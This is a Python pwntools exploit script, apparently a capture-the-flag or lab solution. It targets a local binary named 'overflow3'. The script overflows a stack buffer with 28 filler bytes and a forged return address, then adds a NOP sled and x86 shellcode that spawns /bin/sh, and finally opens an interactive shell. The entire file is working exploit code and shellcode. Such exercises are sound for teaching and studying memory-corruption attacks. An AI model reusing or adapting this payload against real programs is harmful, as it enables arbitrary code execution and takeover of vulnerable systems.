#!/usr/bin/python

from pwn import *

def main():
    # start a process
    p = process("./overflow3")

    # create payload
    #ret_address = 0x5655554d
    ret_address = 0xffffd620 + 28 + 4
    shellcode = ("\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" +
                 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" +
                 "\x80\xe8\xdc\xff\xff\xff/bin/sh")
    payload = "A" * 28 + p32(ret_address)
    padding_len = 100 - len(payload) - len(shellcode)
    payload += "\x90" * padding_len + shellcode


    # print the process id
    #raw_input(str(p.proc.pid))

    # send the payload to the binary
    p.send(payload)

    # pass interaction bac to the user
    p.interactive()

if __name__ == "__main__":
    main()